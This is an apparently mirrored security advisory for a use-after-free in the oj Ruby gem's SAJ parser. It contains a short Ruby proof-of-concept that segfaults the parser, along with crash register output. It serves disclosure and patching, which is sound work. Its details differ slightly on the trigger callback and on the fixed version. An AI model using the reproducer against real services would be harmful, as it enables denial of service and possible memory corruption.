GHSA-M578-W5VF-RFCM
Vulnerability from github – Published: 2026-06-19 20:47 – Updated: 2026-06-19 20:47Summary
Oj::Parser in SAJ mode does not protect cached object keys (≥ 35 bytes) from garbage collection. A Ruby callback that triggers GC inside hash_end can cause the key string to be reclaimed while the C parser still holds a pointer to it. The subsequent access to the freed string VALUE results in a segfault, confirmed by an RIP pointing to address 0x4242 (a canary-style pattern suggesting control over the freed memory's content).
Version
- Software: oj gem
- Affected: all versions with
ext/oj/saj2.c/ext/oj/parser.c - Latest tested: 3.17.1 (confirmed present)
Details
Short keys (≤ 34 bytes) are stored inline on the C stack and are safe. Long keys (≥ 35 bytes) are stored as heap-allocated Ruby String objects passed to rb_funcall as the key argument. Between the key being resolved and the callback completing, a GC triggered inside the callback (e.g. GC.start) can collect the key String, leaving a dangling VALUE.
Crash output:
long_key_trigger
[BUG] Segmentation fault at 0x0000000000004242
close_object+0x260 /ext/oj/usual.c:405 (calls rb_funcall with freed key)
parse+0x11ff /ext/oj/parser.c:693
parser_parse+0x145 /ext/oj/parser.c:1408
RIP: 0x7fd1b46d68b7 RDI: 0x0000000000004242 (freed key VALUE)
R12: 0x0000000000004242
The freed VALUE 0x4242 shows the attacker-controlled content of the key string was loaded as a pointer — a classic use-after-free indicator.
Reproduce
require 'oj'
class H < Oj::Saj
def add_value(value, key)
GC.start(full_mark: true, immediate_sweep: true) if key == 'x'
end
def hash_start(key); end
def hash_end(key); end
end
p = Oj::Parser.new(:saj)
p.handler = H.new
p.parse('{"' + 'A' * 35 + '":{"x":1}}') # long outer key, GC fires on inner key
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c 3.17.2"
},
"package": {
"ecosystem": "RubyGems",
"name": "oj"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.17.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54902"
],
"database_specific": {
"cwe_ids": [
"CWE-416"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-19T20:47:28Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\n`Oj::Parser` in SAJ mode does not protect cached object keys (\u2265 35 bytes) from garbage collection. A Ruby callback that triggers GC inside `hash_end` can cause the key string to be reclaimed while the C parser still holds a pointer to it. The subsequent access to the freed string VALUE results in a segfault, confirmed by an RIP pointing to address `0x4242` (a canary-style pattern suggesting control over the freed memory\u0027s content).\n\n### Version\n\n- **Software**: oj gem\n- **Affected**: all versions with `ext/oj/saj2.c` / `ext/oj/parser.c`\n- **Latest tested**: 3.17.1 (confirmed present)\n\n### Details\n\nShort keys (\u2264 34 bytes) are stored inline on the C stack and are safe. Long keys (\u2265 35 bytes) are stored as heap-allocated Ruby String objects passed to `rb_funcall` as the `key` argument. Between the key being resolved and the callback completing, a GC triggered inside the callback (e.g. `GC.start`) can collect the key String, leaving a dangling VALUE.\n\nCrash output:\n```\nlong_key_trigger\n[BUG] Segmentation fault at 0x0000000000004242\n close_object+0x260 /ext/oj/usual.c:405 (calls rb_funcall with freed key)\n parse+0x11ff /ext/oj/parser.c:693\n parser_parse+0x145 /ext/oj/parser.c:1408\n\nRIP: 0x7fd1b46d68b7 RDI: 0x0000000000004242 (freed key VALUE)\nR12: 0x0000000000004242\n```\n\nThe freed VALUE `0x4242` shows the attacker-controlled content of the key string was loaded as a pointer \u2014 a classic use-after-free indicator.\n\n### Reproduce\n\n```ruby\nrequire \u0027oj\u0027\n\nclass H \u003c Oj::Saj\n def add_value(value, key)\n GC.start(full_mark: true, immediate_sweep: true) if key == \u0027x\u0027\n end\n def hash_start(key); end\n def hash_end(key); end\nend\n\np = Oj::Parser.new(:saj)\np.handler = H.new\np.parse(\u0027{\"\u0027 + \u0027A\u0027 * 35 + \u0027\":{\"x\":1}}\u0027) # long outer key, GC fires on inner key\n```",
"id": "GHSA-m578-w5vf-rfcm",
"modified": "2026-06-19T20:47:28Z",
"published": "2026-06-19T20:47:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ohler55/oj/security/advisories/GHSA-m578-w5vf-rfcm"
},
{
"type": "PACKAGE",
"url": "https://github.com/ohler55/oj"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Oj: Use-After-Free in Oj::Parser SAJ Long Key Callback"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.